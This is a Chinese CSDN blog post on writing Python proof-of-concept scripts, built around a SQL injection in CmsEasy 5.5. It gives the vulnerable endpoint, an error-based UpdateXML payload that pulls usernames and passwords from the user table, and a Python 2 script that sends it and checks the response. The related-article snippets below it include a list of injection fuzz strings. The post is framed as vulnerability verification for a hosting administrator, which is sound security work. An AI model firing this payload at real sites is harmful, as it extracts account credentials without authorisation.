sql注入pythonpoc_python poc是什么

最新推荐文章于 2023-08-22 18:04:20 发布
最新推荐文章于 2023-08-22 18:04:20 发布
阅读量247 收藏
点赞数
文章标签: sql注入pythonpoc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39627052/article/details/111451190
版权
本文介绍了PoC在安全研究中的作用,特别是在验证SQL注入漏洞中的应用。通过一个具体的SQL注入案例,展示了如何使用Python编写PoC,包括场景还原、漏洞复现和PoC测试,以检测目标网站是否存在特定的SQL注入漏洞。
摘要由CSDN通过智能技术生成

如今,PoC 的编写在我们安全研究团队是每个人必备的技能之一。那么,PoC是什么呢?我们应该如何优雅的来进行编写?

0x00 我们需要掌握的几个的概念

PoC(全称:Proof of Concept)中文意思是“观点证明”。在安全行业中PoC则是一段验证漏洞的程序,使我们能够确认这个漏洞是真实存在的。

Python,是一种面向对象、解释型计算机程序设计语言。常见的一些库我们需要了解,比如:urllib,urllib2,re,request,socket等,本文我们要使用Python这门语言,Python的基础知识我们不做讲解。

SQL Injection,通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。

0x01 PoC编写流程

场景还原:某网站托管公司,旗下托管了数万个站点,负责这些站点的安全,但是突然某一天,某知名CMS程序被爆出存在一个高危的SQL注入,某网管排查后发现旗下托管网站中存在几百个站点使用该CMS程序,那么一个一个去排查是否存在该漏洞是非常繁琐的,所以,我们需要一个PoC来验证下。

·根据该漏洞详情的描述,假设已知出现漏洞的CMS版本号为4.1,可以去其官网或者GitHub上去下载相对应的版本。

·下载之后,模拟其服务器真实环境,本地进行搭建。根据漏洞描述,进行复现,已SQL注入为例,重复提交不同的参数,观察不同的返回结果,同时注意如果该漏洞不存在出现的结果。

·根据漏洞复现的实际情况,进行PoC的编写。

·PoC写完之后需要进行相关的测试,已确保该PoC的编写没有问题,比如测试靶机程序,以及不存在漏洞的程序。

0x02 SQL Injection poc编写

已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细

(由于wooyun已经暂停访问,故不上链接了)。

·首先,我们需要下载其相关源码,进行本地搭建。

阅读漏洞细节,我们得知其url与payload如下:

URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20

·漏洞复现:我们根据其漏洞描述,进行复现,该注入点需要发起一个Post请求,我们使用Firefox浏览器配合hackbar插件进行复现,填入url与payload,发送,获取其账户密码。

漏洞效果如下:

这样,我们的漏洞就已经复现成功了。接下来,我们来写Poc。#!/usr/bin/env python

# coding:utf-8

import urllib2

import urllib

import re

import sys

def verify(url):

target = '%s/celive/live/header.php' % url

#需要发送的数据

post_data = {

'xajax': 'LiveMessage',

'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }

try:

#发送请求

req = urllib2.Request(target, data=urllib.urlencode(post_data))

response = urllib2.urlopen(req)

#处理请求,进行判断

if response:

data = response.read()

if "XPATH syntax error" in data:

print "%s is vulnerable" % target

else:

print "%s is not vulnerable" % target

except Exception, e:

print "Something happend..."

print e

def main():

args = sys.argv

url = ""

if len(args) == 2:

url = args[1]

verify(url)

else:

print "Usage: python %s url" % (args[0])

if __name__ == '__main__':

main()

weixin_39627052
关注
sql注入pythonpoc_DVWA SQL-injection 附python脚本
weixin_39896256的博客
12-17 391
SQL-Injectionlow等级首先我们将dvwa等级调到low 如图接下来选择SQL Injection,并在提交框中输入正常值1,查看返回结果接下来检测是否存在注入,分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时,发现报错页面,提示我们语句没有闭合,所以我们输入1' and '1'='1和 1' and '1'='2得到如上回显信息说明存在注入...
sql注入pythonpoc_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_35517006的博客
02-11 194
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument(‘-u‘,dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
sql注入pythonpoc_SQL注入POC
weixin_39702714的博客
12-17 256
#encoding=utf-8importhttplibimportrequestsimporttimeimportstringimportsyspayloads= list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive Oracle info' % ...
pythonpoc编写——sql篇
qq_51796436的博客
03-02 6724
sql注入漏洞漏扫单个网站基础sql扫描多个网站sql基础扫描 poc:即验证漏洞是否存在的脚本,也就是扫描器 兄弟们,开始写扫描器啦 sql注入漏洞漏扫 单个网站基础sql扫描 第一步,当然是写request函数啦。除了时间盲注外,1' and 1=2%23就能判断字符型的sql注入
Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_33910434的博客
12-18 305
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequests importargparse parser=argparse.ArgumentParser() parser.add_argument('-u',dest="url") args=parser.parse_args() url=args.ur...
poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc
09-22
标题中的“poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc”提到了一个VHDL实现的POC(Proof of Concept)项目,它是一个简单的控制程序,可能是针对红绿灯系统的模拟。这个项目主要关注如何用VHDL来构建和...
POC.rar_POC_POC VHDL_VHDL POC_VHDL Printer_poc东南大学
09-24
在本项目中,我们主要探讨的是一个名为"POC.rar"的压缩包文件,它包含了与数字系统设计相关的实验内容,特别是使用VHDL(VHSIC Hardware Description Language)编程语言来实现一个Printer接口,该接口能与CPU进行...
瑞友天翼2024SQL注入漏洞poc
最新发布
02-27
标题中的“瑞友天翼2024SQL注入漏洞poc”指的是瑞友天翼2024版本存在SQL注入漏洞,而POC(Proof of Concept)是指概念验证,通常是一个简单的程序或脚本,用于证明某个安全漏洞确实存在。在网络安全领域,POC是黑客...
POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配
09-21
标题中的“POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配”揭示了这个压缩包的内容主要涉及POC(Proof of Concept)在MATLAB环境中的应用,特别是关于POC过滤器和POC匹配算法,以及利用这些方法进行ROC...
SQL注入POC
weixin_30731305的博客
03-03 498
mysql #encoding=utf-8importhttplibimporttimeimportstringimportsysimportrandomimporturllibheaders={'User-Agent':'Mozilla/5.0(Linux;U;Android2.3.6;en-us;NexusSBuild/GRK39F)Apple...
mysql poc_你的PoC和EXP可能得改改了
weixin_33255691的博客
01-19 357
一、前言在MySQL 5.7.5之前的所有主版本存在一个BUG,该可能导致影响POC/EXP需要重新编写或修正的问题。BUG信息链接:二、问题说明在BUG说明中,可以通过以下SQL语句复现:set names latin1;drop table if exists t1;create table t1(a int) engine=myisam;insert into t1 values (0),(...
Drupal 7.31 SQL注入分析及POC
热门推荐
Exploit的小站~
05-10 2万+
这个漏洞昨天爆出的,今天才有时间看代码。 在Drupal中,执行sql语句都是使用PDO模型进行的,这样做一般来说是可以规避大多数的注入,因为占位符的使用对sql语句的语法进行了限制。 但是这也不意味着绝对的安全,比如这次的漏洞。 在Drupal的user模块中,找到user.module: $account = db_query("SELECT * FROM {users} WHER...
sql注入漏洞poc代码fuzz代码
yyyyxzj的博客
08-22 267
"or "a"="aor 1=1--'or 1=1--"or 1=1--'or'a'='a'or''=''or'='or''OR 1=1"or 1=1'xor'or 1=1/*1'or'1'='1or a = a1 or 1=1a'?' or 1=1--------23 OR 1=10 or 1=1or 0=0 --' or 0=0 #or 0=0 #"
渗透测试之POC基于报错的sql注入
黑面狐
01-03 5461
sql注入一般是主要有三种,基于报错注入,基于布尔的盲注和基于时间的盲注。 原理我不多说了,今天开始写sql注入poc。 首先POC的漏洞存在的证明,而sql注入poc我们只要证明sql语句被执行了即可。 首先看我们的测试环境。 测试环境中我们再注入的参数加个单引号,发现可以有sql报错,从报错额语句中可以看出是基于报错的字符型sql注入 此时用union来确定有多少
什么叫POC ,有什么作用?[z]
liudaoru - 悟
11-23 3268
From: zhidao.baidu.com/question/22294162.html POC,是Proof of Concept的缩写,意思是为观点提供证据,它是一套建议的电子模型,它可用于论证团队和客户的设计,允许评估和确认概念设计方案,POC的评价可能引起规格和设计的调整。POC流程所产生的关于设计的承诺、大家都认可的意见都将记录在设计的调整文档中,以备查。这样下去,POC不断发展。 ...
一个简单sql注入poc
weixin_30279315的博客
12-13 575
最近在提高自己编程能力,拿一些实用的小工具练下。该脚本为python语言,主要涉及模块urllib,re。 功能:验证CmsEasy5.5爆账号密码 实验用源码:http://pan.baidu.com/s/1i4lAwBF 搭建环境:phpstudy     试了IIs+php没爆出来最好用phpstudy。 通过浏览器访问确认存在漏洞存在。 用python来实现。 i...
PHP编写poc,代码实战/萌新如何编写sql注入poc
weixin_42363303的博客
04-13 642
一前言:我去年十月份挖洞挖着就挖到0day了,然后发现18年就被人提过了,内心复杂然后我昨晚闲着无聊,就写个poc,随缘,见一步写一步,哈哈~这里首先介绍一下什么是pocpoc就是指验证网址存在漏洞的一个pyexp是漏洞利用简单的描述一下,咳咳~~正文:二如何编写?http://www.aminotp.com/newsdetail.php?id=6http://haihengpharm.com/...
sql注入pythonpoc_分享使用python编写poc,exp的实例教程
weixin_39592789的博客
12-17 523
在很久很久以,我有一个梦想 但是,后来我发现我的梦想渐渐没有了于是,昨天我思考了一晚上觉得我应该有个梦想的!好了,回到正题。正所谓明人不装暗逼,今天我家开通了公网ip我开森啊,很开森的那种!额,又跑题了下面我们真的开始了:0x01先来简单看看鞋poc,exp的思路吧:首先,我们需要知道这个漏洞,也就是发现漏洞然后,我们需要知道这个漏洞原理,也就是了解原理其次,我们需要搭建环境,或者是网上找环境了解...
sql注入pythonpoc_基于python编写PoC
weixin_39746241的博客
12-17 392
0x02 SQL Injection poc编写已知CmsEasy 5.5 UTF-8程序存在SQL注入,乌云漏洞中的漏洞细节比较详细(由于wooyun已经暂停访问,故不上链接了)。·首先,我们需要下载其相关源码,进行本地搭建。·阅读漏洞细节,我们得知其url与payload如下:URL:http://xxx.xxx/celive/live/header.phpPayload:xajax=Live...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值